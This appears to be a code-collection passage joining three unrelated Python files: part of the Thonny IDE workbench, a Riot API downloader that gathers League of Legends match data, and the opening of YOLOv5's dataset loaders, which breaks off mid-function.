dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
import webbrowser
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
DataDownloader.py
|
# Download games from the Riot API from Challenger/Master players
import configparser
import multiprocessing
import os
import pickle
import random
import sys
import time
from Modes import Base_Mode
from multiprocessing import Manager
from InterfaceAPI import InterfaceAPI, ApiError, ApiError404, ApiError403
ATTEMPTS = 3
class DataDownloader:
def __init__(self, database, patch, region, leagues, timestamped_patches):
self.api = InterfaceAPI()
self.database = database
self.region = region
self.patch = patch
self.timestamped_patches = timestamped_patches
self.db = os.path.join(self.database, 'patches', self.patch, self.region)
if not os.path.exists(self.db):
os.makedirs(self.db)
downloadedFile_name = self.region + '.txt'
self.downloadedGamesPath = os.path.join(self.database, 'patches', self.patch, downloadedFile_name)
if os.path.isfile(self.downloadedGamesPath):
with open(self.downloadedGamesPath, 'r') as f:
self.downloadedGames = [x.strip() for x in f.readlines()]
else:
self.downloadedGames = []
self.summonerIDs = []
if os.path.isfile(os.path.join(database, 'player_listing', region, 'players')):
players = pickle.load(open(os.path.join(database, 'player_listing', region, 'players'), 'rb'))
for league in leagues:
self.summonerIDs.extend(players[league])
random.shuffle(self.summonerIDs)
def downloadData(self):
while self.summonerIDs: # if the API in unavailable, or the sumID is unreachable for w/e reason, just take the skip to the next
sumID = self.summonerIDs.pop()
try:
accountID = self.api.getData('https://%s.api.riotgames.com/lol/summoner/v4/summoners/%s' % (self.region, sumID))['accountId']
games = \
self.api.getData('https://%s.api.riotgames.com/lol/match/v4/matchlists/by-account/%s' % (self.region, accountID), {'queue': 420})[
'matches']
except ApiError403 as e:
print(e, file=sys.stderr)
return e
except ApiError as e:
print(e, file=sys.stderr)
continue
for game in games: # from most recent to oldest
gameID = str(game['gameId'])
# Already downloaded ? This means we are up-to-date
if gameID in self.downloadedGames:
break
# Wrong timestamp?
timestamp = game['timestamp']
previous_patch = self.patch
previous_patch = previous_patch.split('.')
previous_patch[1] = str(int(previous_patch[1]) - 1)
previous_patch = '.'.join(previous_patch)
if previous_patch in self.timestamped_patches and self.timestamped_patches[previous_patch][1] > timestamp: # game is too old
break # all the next games are too old
next_patch = self.patch
next_patch = next_patch.split('.')
next_patch[1] = str(int(next_patch[1]) + 1)
next_patch = '.'.join(next_patch)
if next_patch in self.timestamped_patches and self.timestamped_patches[next_patch][0] < timestamp: # game is too recent
continue # need to go further
try:
gameData = self.api.getData('https://%s.api.riotgames.com/lol/match/v4/matches/%s' % (self.region, gameID))
except ApiError403 as e:
print(e, file=sys.stderr)
return e
except ApiError404 as e:
print(e, file=sys.stderr)
break
except ApiError as e:
print(e, file=sys.stderr)
continue
# update timestamps: gameData['gameCreation'] == game['timestamp']
gamePatch = '.'.join(gameData['gameVersion'].split('.')[:2])
timestamp = gameData['gameCreation']
if gamePatch not in self.timestamped_patches:
self.timestamped_patches[gamePatch] = [timestamp, timestamp]
else: # first seen and last seen
if self.timestamped_patches[gamePatch][0] > timestamp:
self.timestamped_patches[gamePatch][0] = timestamp
elif self.timestamped_patches[gamePatch][1] < timestamp:
self.timestamped_patches[gamePatch][1] = timestamp
# Game too old ?
# formatting both so we can compare
gameVersion = gameData['gameVersion'].split('.')[:2]
gameVersion = tuple(list(map(int, gameVersion)))
patchVersion = tuple(list(map(int, self.patch.split('.'))))
if gameVersion < patchVersion: # too old history
break
if gameVersion > patchVersion: # too recent history
continue
# saving game
file_path = os.path.join(self.db, gameID)
try:
pickle.dump(gameData, open(file_path, 'wb'))
except FileNotFoundError as e:
print(e, file=sys.stderr)
time.sleep(1)
continue
self.downloadedGames.append(gameID)
print(self.patch, self.region, gameID)
try:
with open(self.downloadedGamesPath, 'a+') as f:
f.write(gameID + '\n')
except FileNotFoundError as e:
print(e, file=sys.stderr)
time.sleep(1)
continue
return None # No data left to download
def keepDownloading(database, patches, region, leagues, timestamped_patches, attempts=ATTEMPTS):
print('Starting data collection for', region, patches, file=sys.stderr)
for patch in patches:
dd = None
while True:
if not dd:
try:
dd = DataDownloader(database, patch, region, leagues, timestamped_patches)
except ApiError403 as e:
print('FATAL ERROR', patch, region, e, file=sys.stderr)
return
except ApiError as e:
print(e, file=sys.stderr)
attempts -= 1
if attempts <= 0:
print(region, 'initial connection failed. End of connection attempts.', file=sys.stderr)
return
print(region, 'initial connection failed. Retrying in 5 minutes. Attempts left:', attempts, file=sys.stderr)
time.sleep(300)
continue
e = dd.downloadData()
if e is not None:
print('FATAL ERROR', patch, region, e, file=sys.stderr)
return
print(region, patch, 'all games downloaded', file=sys.stderr)
break
print(region, 'download complete')
def saveLastSeen(timestamped_patches, save_interval, end):
cfg = configparser.ConfigParser()
cfg.read('config.ini')
last_save = time.time()
while not end.is_set():
if last_save + save_interval < time.time():
# we save the dictionnary
for key, value in timestamped_patches.items():
cfg['PATCHES'][key] = ','.join(list(map(str, value)))
with open('config.ini', 'w') as configfile:
cfg.write(configfile)
print('patch timestamps saved')
last_save = time.time()
time.sleep(1)
# we save the final state of the dictionnary
for key, value in timestamped_patches.items():
cfg['PATCHES'][key] = ','.join(list(map(str, value)))
with open('config.ini', 'w') as configfile:
cfg.write(configfile)
print('patch timestamps saved')
def run(mode):
assert isinstance(mode, Base_Mode), 'Unrecognized mode {}'.format(mode)
manager = Manager()
last_seen_from_patch = manager.dict()
endUpdate = manager.Event()
for key, value in mode.config['PATCHES'].items():
last_seen_from_patch[key] = list(map(int, value.split(','))) # first seen and last seen
kdprocs = []
for region in mode.REGIONS:
kdprocs.append(
multiprocessing.Process(target=keepDownloading,
args=(mode.DATABASE, mode.PATCHES_TO_DOWNLOAD, region, mode.LEAGUES, last_seen_from_patch)))
kdprocs[-1].start()
slsproc = multiprocessing.Process(target=saveLastSeen, args=(last_seen_from_patch, 300, endUpdate))
slsproc.start()
for kdproc in kdprocs:
kdproc.join()
endUpdate.set()
slsproc.join()
endUpdate.set()
print('-- Download complete --')
if __name__ == '__main__':
m = Base_Mode()
run(m)
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
from zipfile import ZipFile
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from .augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from .general import (DATASETS_DIR, LOGGER, NUM_THREADS, check_dataset, check_requirements, check_yaml, clean_str,
cv2, segments2boxes, xyn2xy, xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from .torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = 'bmp', 'dng', 'jpeg', 'jpg', 'mpo', 'png', 'tif', 'tiff', 'webp' # include image suffixes
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
BAR_FORMAT = '{l_bar}{bar:10}{r_bar}{bar:-10b}' # tqdm bar format
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count() # number of CUDA devices
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
while not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if urlparse(s).hostname in ('youtube.com', 'youtu.be'): # if source is YouTube video
check_requirements(('pafy', 'youtube_dl==2020.12.2'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) # warning: may return 0 or nan
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
self.fps[i] = max((fps if math.isfinite(fps) else 0) % 100, 0) or 30 # 30 FPS fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] = np.zeros_like(self.imgs[i])
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.im_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.im_files) # same hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupt, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupt"
tqdm(None, desc=prefix + d, total=n, initial=n, bar_format=BAR_FORMAT) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into RAM/disk for faster training (WARNING: large datasets may exceed system resources)
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix('.npy') for f in self.im_files]
if cache_images:
gb = 0 # Gigabytes of cached images
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = self.cache_images_to_disk if cache_images == 'disk' else self.load_image
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(enumerate(results), total=n, bar_format=BAR_FORMAT)
for i, x in pbar:
if cache_images == 'disk':
gb += self.npy_files[i].stat().st_size
else: # 'ram'
self.ims[i], self.im_hw0[i], self.im_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.ims[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.im_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.im_files), bar_format=BAR_FORMAT)
for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [lb, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupt"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.im_files)
x['results'] = nf, nm, ne, nc, len(self.im_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.im_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = self.load_mosaic(index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *self.load_mosaic(random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = self.load_image(index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# nl = len(labels) # update after cutout
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.im_files[index], shapes
def load_image(self, i):
# Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
im, f, fn = self.ims[i], self.im_files[i], self.npy_files[i],
if im is None: # not cached in RAM
if fn.exists(): # load npy
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
assert im is not None, f'Image Not Found {f}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im,
(int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_LINEAR if (self.augment or r > 1) else cv2.INTER_AREA)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.ims[i], self.im_hw0[i], self.im_hw[i] # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
# Saves an image as an *.npy file for faster loading
f = self.npy_files[i]
if not f.exists():
np.save(f.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
